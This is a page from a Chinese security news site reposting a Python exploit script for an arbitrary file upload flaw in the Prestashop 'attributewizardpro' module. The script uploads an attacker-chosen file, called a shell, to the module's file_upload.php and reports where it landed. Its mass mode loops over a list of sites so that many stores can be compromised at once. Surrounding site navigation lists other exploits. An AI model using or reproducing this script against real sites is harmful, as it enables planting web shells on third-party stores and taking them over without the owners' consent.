首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Prestashop Attributewizardpro Module Arbitrary File Upload Exploit
来源:pentesterdesk@gmail.com 作者:PentesterDesk 发布时间:2016-08-29  
#!/usr/bin/python
####################################################################################
#Author  : PentesterDesk
#Date    : 29-June-2016
#Software: Prestashop CMS
#vuln Mod: attributewizardpro
####################################################################################
import sys, os
import requests
def main():
        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
  
        banner = '''
  
                        +======================================================+
                        |    Prestashop  |  FileUpload Exp   |  PentesterDesk  |
                        |         Coded by : PentesterDesk Team                |
                        |         Contact  : pentesterdesk@gmail.com           |
                        +======================================================+
                        '''
        print banner
  
#/modules/attributewizardpro/
        os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
        print banner
        print "\n                       <============[[Attributewizardpro Exploit]]============>\n"
        print "[1] Single Site "
        print "[2] Mass Upload"
        ch=raw_input("\n[>] ")
        if ch == '1':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                print banner
          
                print "\n                       <============[[Attributewizardpro Exploit]]============>\n"
  
                url = raw_input("[+] Enter Url  : ")
                filname= raw_input("[+] Enter File : ")
                if filname == '' or url == '':
                        print "\n[!] Url or File is not entered\n"
                        raw_input("[+] Press Enter [>] ")
                        main()
                url = url + "/modules/attributewizardpro/file_upload.php"
#main
                files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                req=requests.post(url,files=files)
                final =[]
                final = (req.text).split("||||")
                if req.status_code == 200 and filname in req.text:
                        url=url.replace('/file_upload.php','/file_uploads/'+final[0])
                        print ("[+] %s [ok]" % (url))
                else:
                        print "\n[+] %s [no]\n" %url
                        raw_input("\n[+] Press Enter [>] ")
#mass
        if ch == '2':
                os.system('cls' and 'color -a' if os.name == "nt" else 'clear'
                print banner
                print "\n                       <============[[Attributewizardpro Exploit]]============>\n"
                filee = raw_input("[+] Enter List  Name : ")
                filname= raw_input("[+] Enter Shell Name : ")
                if filname == '' or filee == '':
                        print "\n[!] Url or File is not entered\n"
                        raw_input("[+] Press Enter [>] ")
                        main()
                ob = open(filee,'r')
                lists = ob.readlines()
                list1 = []
                i = 0
                for i in range(len(lists)):
                        list1.append(lists[i].strip('\n'))
                count = 0
                for site in (list1):
                        count = count + 1
                        url = site + "/modules/attributewizardpro/file_upload.php"
                        files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
                        req=requests.post(url,files=files)
                        final =[]
                        final = (req.text).split("||||")
                        if req.status_code == 200 and filname in req.text:
                                url=url.replace('/file_upload.php','/file_uploads/'+final[0])
                                print ("[%d] %s [ ok ]" % (count,url))
                        else:
                                print ("[%d]  %s [ No ]" % (count,url))
if __name__ == "__main__":
    main()
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NECROSOFT NScan 0.9.1 Buffer O
·Prestashop VtermSlideShow Modu
·Prestashop Multi Modules Arbit
·INTELLINET IP Camera INT-L100M
·Phoenix Exploit Kit Remote Cod
·NScan 0.9.1 - (Target) Buffer
·OpenSSHD 7.2p2 - User Enumerat
·Goron Webserver 2.0 - Multiple
·WordPress 4.5.3 - Directory Tr
·HelpDeskZ 1.0.2 - Unauthentica
·VideoIQ Camera - Local File Di
·PHP 7.0 - Object Cloning Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved